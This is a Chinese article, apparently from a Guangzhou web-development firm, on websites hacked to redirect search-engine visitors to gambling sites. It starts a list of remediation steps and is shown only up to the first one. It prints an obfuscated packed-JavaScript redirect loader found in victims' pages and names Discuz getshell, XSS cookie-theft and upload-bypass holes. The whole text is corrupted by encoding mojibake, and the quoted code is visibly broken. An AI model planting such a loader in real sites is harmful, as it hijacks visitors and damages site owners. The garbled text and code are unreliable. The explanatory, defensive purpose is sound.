一、分析網(wǎng)站被黑跳轉(zhuǎn)博彩網(wǎng)站原因
一般情況下網(wǎng)站被黑時(shí)候后都是因?yàn)榉?wù)器信息(服務(wù)器IP 遠(yuǎn)程端口 管理員賬號(hào)密碼、SSH端口、root賬號(hào)密碼)和網(wǎng)站信息包括FTP賬號(hào)密碼的對(duì)接被黑客知曉,進(jìn)而造成黑客植入木馬或者后門。
通過(guò)觀察部分客戶網(wǎng)站首頁(yè),其首頁(yè)代碼中都會(huì)有一段加密代碼,這段代碼是根據(jù)搜索引擎的特征來(lái)跳轉(zhuǎn),比如通過(guò)百度搜索,360搜索,搜狗搜索來(lái)的會(huì)直接跳轉(zhuǎn)到彩票,賭博網(wǎng)站上去。如下代碼:
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))
一旦被攻擊之后,百度搜索引擎就會(huì)判斷出網(wǎng)站是否被攻擊,從而在百度風(fēng)險(xiǎn)評(píng)估中心就會(huì)對(duì)網(wǎng)站進(jìn)行記錄以及標(biāo)識(shí),百度網(wǎng)址安全中心提醒您:該站點(diǎn)可能受到黑客攻擊,部分頁(yè)面已被非法篡改! 紅色提示該百度風(fēng)險(xiǎn)。導(dǎo)致客戶打開(kāi)網(wǎng)站直接被百度攔截,如下圖所示:
針對(duì)于以上跳轉(zhuǎn)攻擊的特征,我們廣州網(wǎng)站建設(shè)公司一致認(rèn)為應(yīng)該從人工代碼方面進(jìn)行審計(jì),以及檢測(cè)網(wǎng)站漏洞、網(wǎng)站后門木馬清理、漏洞修復(fù)以及xss獲取管理員賬號(hào)cookies漏洞,discuz存在getshell漏洞,注入獲取管理員漏洞,discuz上傳繞過(guò)漏洞等。
二、修復(fù)以及防止網(wǎng)站被惡意跳轉(zhuǎn)的辦法
1、對(duì)服務(wù)器目錄進(jìn)行安全部署、對(duì)管理員帳號(hào)密碼加密、對(duì)所有密碼進(jìn)行數(shù)字+大小寫(xiě)字母+特殊符號(hào)要求、對(duì)網(wǎng)站數(shù)據(jù)庫(kù)進(jìn)行分配普通權(quán)限賬號(hào)。